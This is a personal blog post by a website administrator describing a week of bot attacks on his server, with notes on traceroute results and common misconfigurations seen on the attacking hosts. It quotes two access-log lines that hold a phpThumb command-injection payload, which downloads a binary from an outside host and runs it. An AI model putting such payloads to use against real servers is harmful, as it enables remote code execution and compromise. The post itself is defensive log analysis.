Rise of the Machine. A week of wetware against bots...

Member for

7 months 4 weeks
Submitted by AlReaud on Fri, 12/23/2011 - 10:12

Note: Updated 11/13/2016

A very interesting week in the wetware vs. botware wars. Patterns and common vulnerabilities are starting to come out of obscurity. New attack vectors have presented themselves. Indeed exciting times, LOL. cheeky

One of the most interesting, attack wise, comes from France and Malaysia. It appears to be a CMS scan, but I don't believe it is. It may be one of the first denial of service reflection attacks. There are embedded bash shell commands in the query string that are directed at specific sites that aren't my IP. I've included two samples below:

 161.139.195.191 - - [23/Dec/2011:02:53:21 -0700] "GET /wp-content/plugins/com-resize/phpthumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20
-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/barbut6%20bingoooo.co.uk/barbut6;c
hmod%200755%20/tmp/barbut6;/tmp/barbut6;ps%20-aux;%20&phpThumbDebug=9 HTTP/1.1" 404 3602

161.139.195.191 - - [23/Dec/2011:02:53:19 -0700] "GET /admin/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]
=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/barbut6%20bingoooo.co.uk
/barbut6;chmod%200755%20/tmp/barbut6;/tmp/barbut6;ps%20-aux;%20&phpThumbDebug=9 HTTP/1.1" 403 14168

Don't waste your time, folks, I penetration test my own systems regularly for weaknesses, and proxy service is turned off. Drupal is also very well protected, BTW. Your rewards for going there are 403's and backtracking… So that's one of the new vectors.

The other interesting proposition was getting these from two countries going in opposite directions. Tracerouting to 161.139.195.191 actually terminates at 161.139.144.4, but now terminates at:
$ traceroute 161.139.195.191
18  ge-0-0-0.glsfb02.ipe.time.net.my (211.25.27.42)

When this was scanned with zenmap, observe were traceroute terminates (click on image to get full resolution version).

Reduced size zenmap of attacker IP.

It's one of the strangest maps I have had the displeasure to view. Again, this week was a virtual tour of the world, LOL! Contacted a hospital in China, because I don't want to be disabling hospital systems because of compromised security at their end.

Common patterns:

  • HTTP TRACE enabled.
  • All or almost all mail ports open (POP, IMAP, etc.)
  • Undefined ports open.
  • Many mails servers with nothing but a control panel login.
  • Most importantly: Almost 100% LINUX SYSTEMS. This is concerning because it means, IMHO, that the configuration has become too complex for most users to securely configure. The 'nix systems can be the most secure when open to the Internet, but if I'm finding this datum, that means that most compromised systems have been mis-configured allowing bot intrusion.

I have the zenmaps, and redacted secure and httpd logs available for research purposes if anybody is interested. Just contact me at alreaud@happycattech.com.

Add new comment

The content of this field is kept private and will not be shown publicly.

Restricted HTML

  • Allowed HTML tags: <a href hreflang> <em> <strong> <cite> <blockquote cite> <code> <ul type> <ol type start> <li> <dl> <dt> <dd> <h2 id> <h3 id> <h4 id> <h5 id> <h6 id> <u> <s> <sup> <sub> <hr>
  • Lines and paragraphs break automatically.
  • Web page addresses and email addresses turn into links automatically.
Image CAPTCHA
Enter the characters shown in the image.